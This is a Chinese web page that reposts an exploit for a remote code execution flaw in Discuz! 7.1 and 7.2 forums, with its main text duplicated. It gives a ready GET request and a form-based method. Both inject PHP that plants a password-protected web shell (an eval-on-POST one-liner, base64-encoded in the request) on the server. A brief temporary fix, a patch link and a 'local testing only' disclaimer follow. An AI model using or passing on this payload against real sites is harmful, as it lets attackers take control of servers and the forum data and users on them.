您现在的位置是:网站首页> 编程资料编程资料
discuz!7.1、7.2 远程代码执行漏洞exp_漏洞分析_网络安全_
2023-05-24
307人已围观
简介 discuz!7.1、7.2 远程代码执行漏洞exp_漏洞分析_网络安全_
第一种方法:
先注册个用户然后把
chr解码后是:value="${${evalfputs(fopen('forumdata/cache/usergroup','w'),'');
里面有个提交地址改下,保存html
打开点提交,会生产forumdata/cache/usergroup_01.php一句话文件,密码是cmd
第二种方法:
直接GET,利用语句:
misc.php?action=imme_binding&response[result]=aa:b&scriptlang[aa][b]={${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}}
在根目录生成C.PHP密码是C
临时修补方法:
在common.inc.php上面加上
$response=$scriptlang=array();
官方发布修补补丁:
http://www.discuz.net/thread-1537673-1-1.html
注:使用exp的话仅限本机测试,其他用途后果自负!
先注册个用户然后把
chr解码后是:value="${${evalfputs(fopen('forumdata/cache/usergroup','w'),'');
里面有个提交地址改下,保存html
打开点提交,会生产forumdata/cache/usergroup_01.php一句话文件,密码是cmd
第二种方法:
直接GET,利用语句:
misc.php?action=imme_binding&response[result]=aa:b&scriptlang[aa][b]={${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}}
在根目录生成C.PHP密码是C
临时修补方法:
在common.inc.php上面加上
$response=$scriptlang=array();
官方发布修补补丁:
http://www.discuz.net/thread-1537673-1-1.html
注:使用exp的话仅限本机测试,其他用途后果自负!
相关内容
- Ewebeditor 的一些漏洞总结 推荐_漏洞分析_网络安全_
- ShopWind网店系统与罗信网络建站 v1.02 上传漏洞_漏洞分析_网络安全_
- eWebEditor 6.2 目录遍历漏洞(asp/browse.asp)_漏洞分析_网络安全_
- 最新win2003 II6解析漏洞实战及应用_漏洞分析_网络安全_
- 微软警告:泄露的Office 2010预览版或含病毒_漏洞分析_网络安全_
- 谨防黑客利用微软DirectShow漏洞传播木马_漏洞分析_网络安全_
- 微软称黑客利用非官方版Windows 7兴风作浪_漏洞分析_网络安全_
- phpwin7.0拿shell的方法_漏洞分析_网络安全_
- PHPWIND & DISCUZ! CSRF漏洞_漏洞分析_网络安全_
- phpcms2008 注入漏洞_漏洞分析_网络安全_
